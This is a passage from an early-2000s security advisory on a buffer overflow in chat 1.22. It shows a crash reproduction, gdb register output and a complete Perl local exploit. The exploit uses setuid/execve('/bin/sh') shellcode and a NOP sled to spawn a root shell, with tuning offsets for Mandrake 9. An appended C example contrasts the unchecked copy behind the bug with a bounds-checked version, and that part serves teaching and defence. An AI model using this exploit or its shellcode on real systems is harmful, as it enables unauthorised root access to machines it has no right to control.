6th Jan 2003 [SBWID-5911]
COMMAND
chat locale buffer overflow
SYSTEMS AFFECTED
chat 1.22
PROBLEM
securma massine [securma@caramail.com] says:
chat is prone to a buffer overflow with a 1056-byte buffer
[root@tasanou sbin]# ./chat `perl -e 'print "A"x1056'`
Segmentation fault (core dumped)
[root@tasanou sbin]# gdb chat core.3261 --quiet
(no debugging symbols found)...
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/i686/libc.so.6...(no debugging
symbols found)...done.
Loaded symbols for /lib/i686/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb) info reg
eax 0x804de90 134536848
ecx 0x0 0
edx 0x186a1 100001
ebx 0x41414141 1094795585
esp 0xbffe6cc0 0xbffe6cc0
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41414141 0x41414141
eip is overwritten
exploit code:
=============
#!/usr/bin/perl
# greets marocit
# Shellcode: setuid(0) followed by execve("/bin/sh"). The "\x" escape
# sequences had lost their backslashes in the listing; restored here.
$shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" .
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
$ret = 0xbfffe8e0;    # guessed stack address, tuned with $offset
$buf = 1056;          # size of the overflowed buffer
$egg = 6000;          # room for the NOP sled plus shellcode
$nop = "\x90";
$offset = 0;
if (@ARGV == 1) { $offset = $ARGV[0]; }
$addr = pack('l', ($ret + $offset));
# fill the buffer with copies of the return address
for ($i = 0; $i < $buf; $i += 4) {
    $buffer .= $addr;
}
# NOP sled, then the shellcode
for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
exec("./chat", $buffer, 0);
# i use offset 1640 (mandrake 9)
SOLUTION
?
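The advisory gives no fix. As an added illustration, not chat's own source, the C below shows the kind of unchecked copy of a command-line argument into a fixed-size stack buffer that produces the crash above (saved ebp and the return address overwritten with 0x41414141), next to a bounds-checked version that refuses input which does not fit. The buffer size and the function names are assumptions chosen to match the 1056-byte argument reported on the page.

```c
/* Added example, not code from chat 1.22. The buffer size is an assumption
 * chosen to match the 1056-byte argument that crashes chat in the advisory. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SCRIPT_BUF 1056   /* hypothetical size of the fixed stack buffer */

/* Unsafe pattern: copy argv[1] into a fixed stack buffer with no length
 * check. An argument of SCRIPT_BUF bytes or more runs past the buffer into
 * the saved frame pointer and return address, which is why gdb shows
 * ebp/eip = 0x41414141 after the 1056 'A's on the page. */
int handle_script_unsafe(const char *arg)
{
    char script[SCRIPT_BUF];
    strcpy(script, arg);        /* no bound: overflows when strlen(arg) >= SCRIPT_BUF */
    return (int)strlen(script);
}

/* Hardened pattern: measure the input first and reject anything that does
 * not fit, leaving room for the terminating NUL. Returns the accepted length
 * or -1 when the argument is refused. */
int handle_script_safe(const char *arg)
{
    char script[SCRIPT_BUF];
    size_t n = strlen(arg);
    if (n >= sizeof script) {
        fprintf(stderr, "chat: script argument too long (%zu bytes, max %zu)\n",
                n, sizeof script - 1);
        return -1;
    }
    memcpy(script, arg, n + 1); /* n + 1 copies the NUL as well */
    return (int)n;
}

/* Helper for testing: a string of c repeated n times, the same input shape
 * as perl -e 'print "A"x1056' in the advisory. Caller frees the result. */
char *make_filler(char c, size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return NULL;
    memset(s, c, n);
    s[n] = '\0';
    return s;
}

int main(int argc, char **argv)
{
    /* constructed default: a typical modem chat script fragment */
    const char *arg = argc > 1 ? argv[1] : "ABORT BUSY '' ATZ OK ATDT5551212 CONNECT";
    int r = handle_script_safe(arg);
    printf("safe handler returned %d\n", r);
    return r < 0 ? 1 : 0;
}
```

Run with a long argument (`./a.out "$(perl -e 'print "A"x1056')"`) and the hardened handler reports the oversize input and exits non-zero instead of faulting; the unsafe handler is kept only to show the pattern and should not be fed such input.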